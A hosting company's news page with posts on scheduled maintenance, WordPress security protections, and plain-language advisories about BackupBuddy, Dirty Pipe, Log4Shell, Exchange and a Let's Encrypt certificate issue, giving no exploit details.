Brief scheduled maintenance December 16-17, 2023

Between 10:00 PM on Saturday December 16 and 4:00 AM on Sunday December 17 (Pacific time), approximately 25% of our hosting servers will be restarted. This will cause a brief interruption of service (less than 10 minutes) for those sites at some point during this 6 hour period.

You can follow the status of the maintenance on our system status page.

Read the rest of this entry »

Brief scheduled maintenance September 29, 2023

Between 10:00 PM and 11:59 PM Pacific time on Friday, September 29, each of our hosting servers will be restarted. This will cause a brief interruption of service (less than 5 minutes) for each site at some point during this 2 hour period.

You can follow the status of the maintenance on our system status page.

Read the rest of this entry »

Protection against the BackupBuddy file download bug

The authors of the popular BackupBuddy WordPress plugin recently announced a serious security bug in many versions of their software.

This bug is being exploited by “hackers” who have used it to download the private “wp-config.php” file of many WordPress sites. It’s then possible to use the private information in that file to login to your WordPress dashboard without knowing the password, or to modify your site’s database.

We’ve added firewall rules to block downloads of that file via the bug, but in addition, we’re taking the following steps to protect our customers who were using a vulnerable version of the BackupBuddy plugin at any point between August 26 and September 8:

  1. Changed the backend WordPress database password to a new random one; and
  2. Changed the WordPress “salts” in the wp-config.php file.

These are the steps recommended in the post by the BackupBuddy authors, so our customers don’t need to do this themselves. (The post also suggests an optional third step, but that doesn’t apply to most WordPress sites.)

The only difference affected customers should notice is that WordPress may ask for your normal password again the next time you login, rather than “remembering” you from a previous login.

If you’re using the BackupBuddy plugin on your site, it’s also a good idea to make sure you’re using the latest version of it — in fact, it’s a good idea to turn on automatic updates for all your plugins to minimize the risk of something like this affecting you.

Finally, keep in mind that we already make daily backups of your website at no extra charge. We never want to discourage people from making their own additional backups, but those extra backups are most useful if they’re stored in another location (not just on the same server you’re making a backup of). While investigating this, we noticed that most people using BackupBuddy are simply storing an extra copy on the same server, which doesn’t add much protection against data loss. If you make your own backups, you should ideally copy them to your own computer, or to an external location like Dropbox.

Our servers are not vulnerable to the March 2022 “Dirty Pipe” security bug

Customers have asked us whether our servers are vulnerable to the recent serious security bug CVE-2022-0847 (nicknamed “Dirty Pipe”) in the Linux kernel software (explained in more technical detail here).

The good news is that we don’t use the vulnerable versions of the kernel software on our servers, and we’ve verified in multiple ways that our servers are not vulnerable to this problem.

Protection against setting the WordPress default “role” to “Administrator”

If you use WordPress, and you allow strangers to register for WordPress accounts (which isn’t usually a good idea, but some plugins require it), it’s possible to accidentally configure it so that those new users get created as WordPress administrators. That can happen simply by doing this:

Allowing this is a serious flaw that was supposed to be fixed in WordPress itself some time ago, but the problem still exists.

We don’t think it’s reasonable to ever create new users as “Administrators” by default, regardless of whether you have “anyone can register” turned on. (Even if “anyone can register” is turned off now, it would be easy to turn it on later without remembering to change the default role back.)

To make sure our customers’ sites stay secure, we’ve added some protections against this:

  • Setting the “New User Default Role” to “Administrator” is blocked at the Web Application Firewall (mod_security) level on our servers, whether from the WordPress dashboard or from any other web request;
  • If it somehow gets set anyway, our security systems will detect it as part of the daily security scan we do of every site;
  • If your site already had this setting as of today, we’ve restored it to the default “Subscriber” role.

Nobody should notice any changes as a result of this, but as always, don’t hesitate to contact us if you have any questions or difficulties.

Our servers are not vulnerable to the December 2021 Log4Shell / Log4j security bug

Customers have asked us whether our servers are vulnerable to the recent serious security bug (called “Log4Shell”) in software named “Log4j”.

The good news is that we don’t use the Log4j software anywhere on our servers, and never have. We’ve verified in multiple ways that our servers are not vulnerable to this problem.

That said, we always believe in “defense in depth” when it comes to security, so we’ve also added rules to our web application firewall that will block any IP addresses making attempts to exploit this bug.

Brief scheduled maintenance July 16, 2021

Between 10:00 PM and 11:59 PM Pacific time on Friday, July 16, each of our hosting servers will be restarted. This will cause a brief interruption of service (less than 5 minutes) for each site at some point during this 2 hour period.

Read the rest of this entry »

Our servers are not vulnerable to the March 2021 Microsoft Exchange security bug

Recently, Microsoft announced that their “Microsoft Exchange” email server software has several security bugs that allow “hackers” to infect it with malware. That allows the “hackers” to read private email.

Some customers have asked us whether our servers are vulnerable to this problem.

The good news is that we don’t use Microsoft Exchange (or any other Microsoft email server) software, and never have. That means our servers, and our customers who use our email services, are not vulnerable to this problem at all.

WordPress 5.5

WordPress 5.5 was recently released, and as always, we’ve updated our WordPress one-click installer to automatically install the latest version for new WordPress sites. WordPress 5.5 works fine on our servers (make sure you’re using a recent version of PHP for your site).

If you’ve previously installed an older version of WordPress, you should update it from within your WordPress Dashboard.

One great new feature of WordPress 5.5 is that it adds automatic updates of plugins and themes. We strongly recommend enabling this feature to improve the security of your site. To do that, just click “Enable auto-updates” for all your plugins and themes:

That’s all it takes to prevent most “hacker” attacks on your site.

Sites hosted with us aren’t affected by today’s “Let’s Encrypt” SSL security bug

We provide free Let’s Encrypt SSL certificates for all sites hosted with our company.

Recently, Let’s Encrypt found a problem with some certificates that could cause site visitors to see security warnings if the certificate wasn’t renewed before noon Pacific time today (March 4, 2020).

Our customers don’t need to worry, though. We’ve already renewed any affected certificates, so the problem will not affect any sites we host.

There’s a website at checkhost.unboundtest.com you can use to test your certificate if you want to be sure. As always, don’t hesitate to contact us if you have any questions.